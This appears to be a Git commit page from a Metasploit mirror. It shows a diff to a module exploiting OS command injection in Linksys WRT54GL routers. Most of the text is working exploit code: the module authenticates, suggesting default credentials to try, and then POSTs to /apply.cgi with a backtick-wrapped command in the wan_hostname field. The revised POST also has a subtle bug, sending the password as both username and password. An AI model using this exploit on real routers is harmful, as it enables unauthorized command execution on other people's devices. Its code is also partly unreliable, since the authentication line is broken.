infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

hopefully all fixex included

bug/bundler_fix
m-1-k-3 2013-01-23 12:15:34 +01:00
parent 11c13500be
commit 3a5e92ba6f
1 changed files with 80 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

113
modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Linksys WRT54GL Remote Command Execution',
'Description' => %q{
Some Linksys Routers are vulnerable to OS Command injection.
You will need credentials to the webinterface to access the vulnerable part
You will need credentials to the web interface to access the vulnerable part
of the application.
Default credentials are always a good starting point. admin/admin or admin
and blank password could be a first try.
@ -34,8 +34,10 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
[ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
[ 'EDB', '24202' ],
[ 'BID', '57459' ],
[ 'OSVDB', '89421' ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 18 2013'))
@ -43,12 +45,12 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(80),
OptString.new('VULNPATH',[ true, 'PATH to OS Command Injection', '/apply.cgi']),
OptString.new('USER',[ true, 'User to login with', 'admin']),
OptString.new('PASS',[ true, 'Password to login with', 'password']),
OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']),
OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
OptString.new('PASSWORD',[ true, 'Password to login with', 'password']),
OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
OptString.new('LANIP', [ false, 'LAN IP address of the router', '<RHOST>']),
OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']),
OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']),
@ -56,46 +58,41 @@ class Metasploit3 < Msf::Auxiliary
end
def run
#setting up the needed variables
uri = datastore['VULNPATH']
user = datastore['USER']
#setting up some basic variables
uri = datastore['TARGETURI']
user = datastore['USERNAME']
rhost = datastore['RHOST']
netmask = datastore['NETMASK']
routername = datastore['ROUTER_NAME']
wandomain = datastore['WAN_DOMAIN']
wanmtu = datastore['WAN_MTU']
# using the RHOST for the correct lan IP settings
# WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device!
if datastore['LANIP'] !~ /<RHOST>/
if datastore['LANIP'] !~ /1.1.1.1/
#there is a configuration from the user so we use LANIP for the router configuration
ip = datastore['LANIP'].split('.')
else
#no configuration from user so we use RHOST for the router configuration
ip = rhost.split('.')
end
# not sure if this is a good way for blank passwords:
if datastore['PASS'] == "<BLANK>"
if datastore['PASSWORD'] == "<BLANK>"
pass = ""
else
pass = datastore['PASS']
pass = datastore['PASSWORD']
end
print_status("Trying to login with #{user} / #{pass}")
user_pass = Rex::Text.encode_base64(user + ":" + pass)
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
}
}, 25)
'basic_auth' => "#{user}:#{pass}"
})
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{target_url} not responding")
vprint_error("#{rhost} not responding")
end
return :abort if (res.code == 404)
@ -108,16 +105,17 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
vprint_error("#{rhost} - Failed to connect to the web server")
return :abort
end
print_status("Sending remote command: " + datastore['CMD'])
cmd = Rex::Text.uri_encode(datastore['CMD'])
#cmd = datastore['CMD']
# cmd = Rex::Text.uri_encode(datastore['CMD'])
cmd = datastore['CMD']
data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
#original Post Request:
# data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
if datastore['VERBOSE'] == true
print_line("using the following target URL: \n#{uri}")
@ -128,17 +126,66 @@ class Metasploit3 < Msf::Auxiliary
{
'uri' => uri,
'method' => 'POST',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
},
'data' => data_cmd,
}, 20)
'basic_auth' => "#{pass}:#{pass}",
#'data' => data_cmd,
'vars_post' =>
{
'submit_button' => "index",
'change_action' => "1",
'submit_type' => "1",
'action' => "Apply",
'now_proto' => "dhcp",
'daylight_time' => "1",
'lan_ipaddr' => "4",
'wait_time' => "0",
'need_reboot' => "0",
'ui_language' => "de",
'wan_proto' => "dhcp",
'router_name' => "#{routername}",
'wan_hostname' => "`#{cmd}`",
'wan_domain' => "#{wandomain}",
'mtu_enable' => "1",
'wan_mtu' => "#{wanmtu}",
'lan_ipaddr_0' => "#{ip[0]}",
'lan_ipaddr_1' => "#{ip[1]}",
'lan_ipaddr_2' => "#{ip[2]}",
'lan_ipaddr_3' => "#{ip[3]}",
'lan_netmask' => "#{netmask}",
'lan_proto' => "dhcp",
'dhcp_check' => "1",
'dhcp_start' => "100",
'dhcp_num' => "50",
'dhcp_lease' => "0",
'wan_dns' => "4",
'wan_dns0_0' => "0",
'wan_dns0_1' => "0",
'wan_dns0_2' => "0",
'wan_dns0_3' => "0",
'wan_dns1_0' => "0",
'wan_dns1_1' => "0",
'wan_dns1_2' => "0",
'wan_dns1_3' => "0",
'wan_dns2_0' => "0",
'wan_dns2_1' => "0",
'wan_dns2_2' => "0",
'wan_dns2_3' => "0",
'wan_wins' => "4",
'wan_wins_0' => "0",
'wan_wins_1' => "0",
'wan_wins_2' => "0",
'wan_wins_3' => "0",
'time_zone' => "-08+1+1",
'_daylight_time' => '1'
},
})
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
vprint_error("#{rhost} - Failed to connect to the web server")
return :abort
end
print_status("Blind Exploitation - wait 5 seconds until the configuration gets applied\n")
print_line("")
print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed")
print_status("Blind Exploitation - unknown Exploitation state\n")
end
end